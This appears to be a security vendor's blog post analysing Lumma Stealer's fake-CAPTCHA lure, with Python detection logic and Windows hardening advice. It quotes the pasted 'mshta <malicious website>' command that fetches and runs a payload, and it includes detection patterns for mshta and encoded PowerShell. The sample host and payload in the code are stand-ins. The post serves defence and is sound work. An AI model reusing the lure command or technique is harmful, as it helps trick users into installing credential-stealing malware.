Fake CAPTCHAs, Real Threats: How Lumma Stealer Tricks Users into Self-Inflicted Malware

Executive Summary

SenseOn has detected a large increase in Lumma Stealer malware targeting customers over the past few months. Unlike traditional malware strains, Lumma Stealer has been leveraging a unique, and increasingly effective, access vector: fake CAPTCHA verification prompts. These deceptive prompts trick users into running malicious commands on their own device, eventually injecting malicious processes into legitimate programs. This attack vector is expected to become even more prevalent throughout 2025.

This blog explores how Lumma Stealer operates, highlights the dangers of this innovative attack method, and demonstrates how SenseOn detects this malicious behaviour. We also look into actionable recommendations, including blocking the mshta.exe process and disabling the run dialog, to protect your environment from Lumma Stealer infections.

What is Lumma Stealer?

Lumma Stealer is a strain of information-stealing malware that has been observed in the wild since 2022 and is currently offered on the dark web under a Malware-as-a-Service (MaaS) model. Like other info-stealers, Lumma Stealer attempts to exfiltrate system and installed-program data from compromised devices, along with sensitive information including browser cookies, stored credentials and financial information.

Lumma Stealer has been observed targeting a range of individuals and organisations, likely due to the wide availability of the malware. Furthermore, because it operates under a Malware-as-a-Service (MaaS) model, it enables low-level threat actors with minimal technical expertise to successfully compromise victims.

It is believed that Lumma Stealer was developed by the threat group ‘Shamel’, which uses the alias ‘Lumma’. The group has been active since at least August 2022, offering its malware primarily on Russian-speaking dark web forums.

Initial Access

In recent campaigns, SenseOn has observed Lumma Stealer being deployed through fake CAPTCHA verifications hosted on compromised websites. CAPTCHAs are security tests designed to differentiate between human users and automated behaviour; they typically require users to solve puzzles such as identifying objects in images or typing distorted text. Victims are usually redirected to these malicious sites through SEO (Search Engine Optimisation) manipulation or by clicking on malicious ads displayed on legitimate websites. Threat intelligence also suggests these compromised or malicious domains are being distributed through phishing emails. Once users visit these sites, they are confronted with a deceptive CAPTCHA prompt designed to trick them into executing malicious actions.

When users interact with the fake CAPTCHA, a pop-up instructs them to paste the contents of their clipboard into the ‘Run’ dialog box on their Windows machine. The command is crafted so that users only see the benign string ‘✅ "I am not a robot - reCAPTCHA Verification ID: <random digits>"’, which matches the text shown on the compromised website.

Because of the length of the command, the malicious portion is hidden from view in the Run dialog. The command actually executed is: ‘mshta <malicious website> # ✅ "I am not a robot - reCAPTCHA Verification ID: <random digits>"’

An example of the initial access website along with the Run dialog command can be seen below:

Upon execution of this command, a disguised HTA file is retrieved from a malicious domain. HTA files are HTML Applications, which can run executables and therefore perform tasks directly on a Windows system. This HTA file leads to the execution of obfuscated PowerShell, eventually deploying the Lumma Stealer malware to the device.

How does SenseOn detect this?

SenseOn leverages Deep Packet Inspection (DPI) and AI triangulation to thoroughly analyse and detect activity generated by malware strains like Lumma Stealer. By unifying network and process telemetry, we are able to develop comprehensive detections aligned with MITRE tactics and techniques. This includes techniques observed at every step of the infection chain, from the malicious MSHTA command to obfuscated PowerShell code to command and control network traffic. This correlation provides a complete view of the tactics associated with the threat, enabling swift and effective response.

To detect this specific method of initial access, our detections such as ‘Living Off the Land binary (LOLBIN) making an unusual network connection’ and ‘Suspicious connection from commonly abused process’ can identify ‘mshta.exe’ connecting to suspicious external domains. This enables us to quickly detect the first-stage payload download.

In these instances of Lumma Stealer running, we also see ‘mshta.exe’ executing a malicious encoded PowerShell command; this behaviour causes the SenseOn observation ‘Mshta Spawning Windows Shell’ to be raised in the platform. This behaviour is a key indicator of a Lumma Stealer deployment.

Once Lumma Stealer is successfully deployed, the malware begins beaconing to suspicious domains. This beaconing is performed by the ‘powershell.exe’ process and further raises ‘Suspicious connection from commonly abused process’.
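As an added illustration of the detection logic described in this section (example code written for this post, not SenseOn's own detections), the following Python triages a few constructed process-creation and network events for the three behaviours named above: mshta.exe launched with a remote URL, mshta.exe spawning an encoded PowerShell command, and a LOLBIN making an outbound connection. The event format, hostnames and the decoded stand-in script are all constructed for the example.

```python
import base64
import re
from typing import List, Optional, Tuple

LOLBINS = {"mshta.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://\S+", re.I)
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)  # -e/-enc/-encodedcommand <b64>

def encode_ps(text: str) -> str:  # PowerShell -EncodedCommand form: base64 over UTF-16LE
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

def decode_ps(blob: str) -> Optional[str]:
    """Recover script text from an encoded command, or None if the blob is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def parse_events(text: str) -> List[Tuple[str, str, str, str]]:
    """Parse constructed 'kind|parent|image|detail' lines; kind is 'proc' (process creation,
    detail = command line) or 'net' (outbound connection, detail = host:port, parent = '-')."""
    rows = [ln.split("|", 3) for ln in text.splitlines() if ln.strip()]
    return [(k, p.lower(), i.lower(), d) for k, p, i, d in rows]

def triage(events) -> List[Tuple[str, str, str]]:
    """Return (rule, image, evidence) for every event a detection fires on."""
    alerts = []
    for kind, parent, image, detail in events:
        url = URL_RE.search(detail) if kind == "proc" else None
        if image == "mshta.exe" and url:  # first-stage HTA fetched from a remote host
            alerts.append(("mshta_remote_payload", image, url.group(0)))
        if kind == "proc" and parent == "mshta.exe" and image == "powershell.exe":
            m = ENC_RE.search(detail)  # decode -enc so the analyst sees the real script
            decoded = decode_ps(m.group(1)) if m else None
            alerts.append(("mshta_spawning_shell", image, decoded or detail))
        if kind == "net" and image in LOLBINS:  # LOLBIN making an outbound connection
            alerts.append(("lolbin_network_connection", image, detail))
    return alerts

# Constructed sample telemetry, not real SenseOn events; the trailing comment mirrors the lure string.
STAGE2_STANDIN = "Start-Sleep -Seconds 1"  # harmless stand-in for the obfuscated loader
SAMPLE_EVENTS = "\n".join([
    "proc|explorer.exe|mshta.exe|mshta https://example.invalid/verify # I am not a robot - reCAPTCHA Verification ID: 4182",
    f"proc|mshta.exe|powershell.exe|powershell.exe -w hidden -enc {encode_ps(STAGE2_STANDIN)}",
    "net|-|mshta.exe|example.invalid:443",
    "net|-|powershell.exe|beacon.example.invalid:443",
    "proc|explorer.exe|notepad.exe|notepad.exe C:\\Users\\user\\notes.txt",
    "net|-|chrome.exe|www.example.com:443",
])
```

Running `triage(parse_events(SAMPLE_EVENTS))` yields four alerts in event order, with the benign notepad and browser events producing none.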

Example case from Lumma Stealer running in a sandbox environment, with a summary generated by SenseOn AI. In this environment, EPP was disabled, allowing the malware to run successfully.

How can you prevent this?

SenseOn strongly recommends disabling the Run dialog box across all devices in your environment. This can be accomplished through Group Policy or the Windows Registry.

For Group Policy, set the ‘Remove Run menu from Start Menu’ policy to ‘Enabled’. It is located under User Configuration → Administrative Templates → Start Menu and Taskbar.

Double-click the policy setting to edit it, set the policy to ‘Enabled’, and then click ‘Apply’ to save the changes.

The second method involves adding a new DWORD value named ‘NoRun’ under the registry key ‘HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer’. Set the value to ‘1’; after a reboot, the Run dialog will be disabled.

SenseOn also recommends preventing the execution of ‘mshta.exe’ through AppLocker. To do this, navigate to the Group Policy location Computer Configuration → Windows Settings → Security Settings → Application Control Policies → AppLocker → Executable Rules. Right-click on ‘Executable Rules’ and create a new rule:

In the ‘Create New Rule’ wizard, set the permission to Deny and choose the condition ‘File Hash’. In the ‘File Hash’ pane, specify the path to ‘mshta.exe’, located in ‘C:\Windows\System32’.

We also advise setting PowerShell execution policies to prevent execution of unauthorised, malicious and unsigned scripts.

Conclusion

Lumma Stealer represents a significant and evolving threat, with recent cases observed by SenseOn consistently leveraging fake CAPTCHAs as a highly effective initial access tactic.

By understanding this attack vector and implementing proactive security measures, such as disabling the Run dialog, organisations can significantly reduce the risk posed by this malware.

SenseOn’s advanced detection capabilities enable rapid identification of Lumma Stealer infections. When paired with SenseOn's Active Response feature, SenseOn users can swiftly contain and eradicate these threats.

Stay tuned for an upcoming in-depth technical analysis of Lumma Stealer.
